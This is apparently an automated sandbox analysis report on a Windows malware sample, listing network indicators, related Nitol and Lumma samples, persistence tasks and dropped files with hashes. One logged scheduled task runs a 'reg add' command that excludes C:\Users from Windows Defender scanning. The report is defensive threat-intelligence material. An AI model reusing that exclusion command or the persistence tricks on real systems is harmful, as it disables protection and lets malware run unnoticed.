                                		sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                118.178.60.9
                                		sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                8.217.35.253
                                		unknownSingapore
                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                General Information

                                Joe Sandbox version:42.0.0 Malachite
                                Analysis ID:1591652
                                Start date and time:2025-01-15 09:01:10 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 10m 55s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:52
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:138745635-72645747.116.exe
                                Detection:MAL
                                Classification:mal100.evad.winEXE@70/23@32/3
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 89%
                                • Number of executed functions: 16
                                • Number of non-executed functions: 116
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target NEiV2V.exe, PID 3300 because there are no executed function
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                03:02:13API Interceptor11x Sleep call for process: 138745635-72645747.116.exe modified
                                03:03:34API Interceptor14670x Sleep call for process: 0b1G0H.exe modified
                                03:03:39API Interceptor72670x Sleep call for process: NEiV2V.exe modified
                                08:02:49Task SchedulerRun new task: hUrSj path: C:\Users\user\Documents\0b1G0H.exe
                                08:03:01Task SchedulerRun new task: Task1 path: cmd.exe s>/c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                08:03:42Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 fQP1C path: C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                08:03:42Task SchedulerRun new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 jYNAw path: C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                39.103.20.172834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                  183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                    118.178.60.92834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                      183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                        149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                          13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                            1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                              2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                  2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                    2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                      2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        sc-20ih.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 39.103.20.17
                                                        183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                                        • 39.103.20.17
                                                        sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                        • 118.178.60.9
                                                        2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9
                                                        2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                        • 118.178.60.9

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdmips.elfGet hashmaliciousMiraiBrowse
                                                        • 47.102.23.59
                                                        2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        hsmSW6Eifl.dllGet hashmaliciousWannacryBrowse
                                                        • 8.157.48.1
                                                        m9oUIFauYl.dllGet hashmaliciousWannacryBrowse
                                                        • 8.157.50.194
                                                        Fantazy.arm4.elfGet hashmaliciousUnknownBrowse
                                                        • 120.76.196.118
                                                        meth1.elfGet hashmaliciousMiraiBrowse
                                                        • 120.55.158.191
                                                        meth4.elfGet hashmaliciousMiraiBrowse
                                                        • 8.158.74.79
                                                        i486.elfGet hashmaliciousUnknownBrowse
                                                        • 8.152.237.14
                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                        • 8.158.74.73
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 8.182.17.7
                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 8.217.59.222
                                                        http://tretiktok.com/Get hashmaliciousUnknownBrowse
                                                        • 47.91.24.166
                                                        https://teiegtrm.cc/EN/Get hashmaliciousTelegram PhisherBrowse
                                                        • 47.251.1.68
                                                        https://teiegtrm.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                        • 47.251.1.68
                                                        https://teiegroj.cc/ZH/Get hashmaliciousTelegram PhisherBrowse
                                                        • 47.89.192.18
                                                        https://teiegroj.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                        • 47.89.192.18
                                                        https://teiegrvu.cc/VN/Get hashmaliciousTelegram PhisherBrowse
                                                        • 198.11.177.38
                                                        i686.elfGet hashmaliciousUnknownBrowse
                                                        • 8.208.25.56
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 47.255.177.105
                                                        183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                                        • 8.217.78.242
                                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdmips.elfGet hashmaliciousMiraiBrowse
                                                        • 47.102.23.59
                                                        2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        hsmSW6Eifl.dllGet hashmaliciousWannacryBrowse
                                                        • 8.157.48.1
                                                        m9oUIFauYl.dllGet hashmaliciousWannacryBrowse
                                                        • 8.157.50.194
                                                        Fantazy.arm4.elfGet hashmaliciousUnknownBrowse
                                                        • 120.76.196.118
                                                        meth1.elfGet hashmaliciousMiraiBrowse
                                                        • 120.55.158.191
                                                        meth4.elfGet hashmaliciousMiraiBrowse
                                                        • 8.158.74.79
                                                        i486.elfGet hashmaliciousUnknownBrowse
                                                        • 8.152.237.14
                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                        • 8.158.74.73
                                                        mpsl.elfGet hashmaliciousUnknownBrowse
                                                        • 8.182.17.7

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        a0e9f5d64349fb13191bc781f81f42e192.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                        • 39.103.20.17
                                                        2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 39.103.20.17
                                                        62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                        • 39.103.20.17
                                                        87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                        • 39.103.20.17
                                                        lumma_phothockey.exeGet hashmaliciousLummaCBrowse
                                                        • 39.103.20.17
                                                        mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                        • 39.103.20.17
                                                        lumma1.exeGet hashmaliciousLummaCBrowse
                                                        • 39.103.20.17
                                                        VRO.exeGet hashmaliciousUnknownBrowse
                                                        • 39.103.20.17
                                                        37f463bf4616ecd445d4a1937da06e192834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        regsvr.exeGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 118.178.60.9
                                                        1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                        • 118.178.60.9
                                                        x6yDsHJ9tr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 118.178.60.9
                                                        LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 118.178.60.9

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                          183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                                            149876985-734579485.05.exeGet hashmaliciousNitolBrowse
                                                              13478674376-78423498.01.exeGet hashmaliciousUnknownBrowse
                                                                1387457-38765948.15.exeGet hashmaliciousNitolBrowse
                                                                  2976587-987347589.07.exeGet hashmaliciousNitol, XmrigBrowse
                                                                    2976587-987347589.08.exeGet hashmaliciousNitolBrowse
                                                                      2873466535874-68348745.02.exeGet hashmaliciousUnknownBrowse
                                                                        2362476847-83854387.07.exeGet hashmaliciousNitolBrowse
                                                                          2o63254452-763487230.06.exeGet hashmaliciousNitolBrowse

                                                                            Created / dropped Files

                                                                            C:\Program Files (x86)\2I9luTPI\log.src

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5059989
                                                                            Entropy (8bit):7.999955223972295
                                                                            Encrypted:true
                                                                            SSDEEP:98304:XOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:yo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                            MD5:CBBAD7CD5A45D6591501797BA072A46B
                                                                            SHA1:5C3454116FB4A80B300F878D04AB39B429EA3F37
                                                                            SHA-256:791C22CD30D8993A60469D3E503C6EA49B143AFFF3131CD664B2188ECDCB64A6
                                                                            SHA-512:370B2339F83A0BD7BD265BBE15E65440C515EC7F761DFB02C6D146424982403C26A7964CE657F4CB2C1454D078421B1DA7C0AD1F80A12995E43F95EABE0939A6
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..O..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Program Files (x86)\2I9luTPI\qH3CqQr.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):54152
                                                                            Entropy (8bit):6.64786972992462
                                                                            Encrypted:false
                                                                            SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                            MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                            SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                            SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: 2834573-3676874985.02.exe, Detection: malicious, Browse
                                                                            • Filename: 183643586-388657435.07.exe, Detection: malicious, Browse
                                                                            • Filename: 149876985-734579485.05.exe, Detection: malicious, Browse
                                                                            • Filename: 13478674376-78423498.01.exe, Detection: malicious, Browse
                                                                            • Filename: 1387457-38765948.15.exe, Detection: malicious, Browse
                                                                            • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                                                            • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                                                            • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                                                            • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                                                            • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\2I9luTPI\tbcore3U.dll

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4858192
                                                                            Entropy (8bit):7.992516671894825
                                                                            Encrypted:true
                                                                            SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/y:9S4+O6P5OeMRrjRy7aPZbm3k8V/y
                                                                            MD5:9E7C93403E43DE481B798DA40DB2F0D4
                                                                            SHA1:EE97E1873EE126AAA4135B11640016A55BE9FFD2
                                                                            SHA-256:AEC272F813E7D1AC7486722A1C80D330450C6F0D50C1395CA1D098DBCE72DEBA
                                                                            SHA-512:34F8A54B451BD2A1A133F558FF61A6729863958924580E5BBD4B7702D0457D9F4CF933DEA561EAF332CDF81E6EE6169EE8F634B64AED0CBE8AC70A65FA62922F
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\2I9luTPI\utils.vcxproj

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\NEiV2V\NEiV2V.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):365477
                                                                            Entropy (8bit):7.999400041924249
                                                                            Encrypted:true
                                                                            SSDEEP:6144:xiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:A8u69CghoQxoMTFQqtKFCG7mbZ
                                                                            MD5:4BC0E51612E107D139FEBD5A046014D0
                                                                            SHA1:76999F4DBE66CDD1D954609F8FAE11839573B5F1
                                                                            SHA-256:AE85587F810A0B91F5592D81ED494186AC3604A1B57B1CC0D4DBE3C5F04D1032
                                                                            SHA-512:DE71B9DBFEF4917FA804A7A240DCF43D4E7F627DC01C97B947B14E7FFE8B4DBD61A478397E4930D052264CE18BB9347925DA64F87B2F993C1085C92780853DC2
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......D...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.35.253....."ijstuvwxyz....ikhhya.net......3#..............35.253....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Program Files (x86)\NEiV2V\NEiV2V.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):54152
                                                                            Entropy (8bit):6.64786972992462
                                                                            Encrypted:false
                                                                            SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                                            MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                                            SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                                            SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                                            SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\NEiV2V\log.src

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5059989
                                                                            Entropy (8bit):7.99995522739972
                                                                            Encrypted:true
                                                                            SSDEEP:98304:9OQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:so6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                                            MD5:91BD2942BC4E73128FB48FC975151E62
                                                                            SHA1:8012D1B4B80CD90CCD482CF8B1A13186DE3C38D9
                                                                            SHA-256:2AD42B7C7C3A6D852CF3D9723A7E1E03A86A32A70AC40F4F907430364F166967
                                                                            SHA-512:46D886556295D36C4E2B2866C3507BA0EBE4791B5C340318E8FCB6EAABEE91AEAD8B69C0B4028BACEA2A9D438479FE72521C095268486D23A65AC04544651F9A
                                                                            Malicious:false
                                                                            Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                            C:\Program Files (x86)\NEiV2V\tbcore3U.dll

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):4858192
                                                                            Entropy (8bit):7.99251723734277
                                                                            Encrypted:true
                                                                            SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/8:9S4+O6P5OeMRrjRy7aPZbm3k8V/8
                                                                            MD5:EDDC1BDD454B08109C5D92D7B5C929C9
                                                                            SHA1:DE5800B4BDDCE664BD21B45C89C59D9ADB1813CD
                                                                            SHA-256:A13A6192725E1B45B6B54FB5BF7224DE9C9917844878E809228299A4C778E39A
                                                                            SHA-512:BC5E615DB1D3C1313D723AD816FB7AADE250A9284467EC657079D8041226D25DAD66A94023708D2CB9C0267B724B4760DBBF31BCDA80E839A15D0AE12EEDFBCA
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

                                                                            C:\Program Files (x86)\NEiV2V\utils.vcxproj

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                            Category:dropped
                                                                            Size (bytes):365477
                                                                            Entropy (8bit):7.999400123010918
                                                                            Encrypted:true
                                                                            SSDEEP:6144:niACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:i8u69CghoQxoMTFQqtKFCG7mbZ
                                                                            MD5:08946A399B1B34FBC37C5AB3C12481FB
                                                                            SHA1:B14BE0A809F872EAA1AC650CEBDC41A1BA6D66A0
                                                                            SHA-256:2FCE485E3A685B3E334BB77F256C83F7F00FDE6BF1775FD59C7E7824D48E3FBE
                                                                            SHA-512:27D3F3897209C0276473439E1B6DFED1C179E38F2E90DA6314C2ED42025AF88DFEC53BCAD7BE549F3CAA63D483D161A68824C1D6AAB9125CE505834A3C43ADBA
                                                                            Malicious:false
                                                                            Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.35.253....."ijstuvwxyz....ikhhya.net......3#..............35.253....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A

                                                                            C:\Users\Public\Music\destopbak.ini

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:l:l
                                                                            MD5:739EDCC2C973B7A990767601FA661F21
                                                                            SHA1:6F8DF82DC929F3C40E2403252D9C7EC09001DBB6
                                                                            SHA-256:BA3C702B24E4EF16C111BF92823170F6E81FD37FBAFACCBEEF52192A1C094380
                                                                            SHA-512:098608F58AB3FC68088ACE47A30C15056D274AADA2893A224C29DDC0CC70F82B4CA723CE487DED1306F839AC12EE8782BC6383817FD77E7CDE3DEA99525731D1
                                                                            Malicious:false
                                                                            Preview:.@

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-52[1].jpg

                                                                            Download File
                                                                            Process:C:\Users\user\Documents\0b1G0H.exe
                                                                            File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):5062442
                                                                            Entropy (8bit):7.999518892518095
                                                                            Encrypted:true
                                                                            SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                            MD5:70C21DA900796B279A09040B00953E40
                                                                            SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                            SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                            SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                            Malicious:false
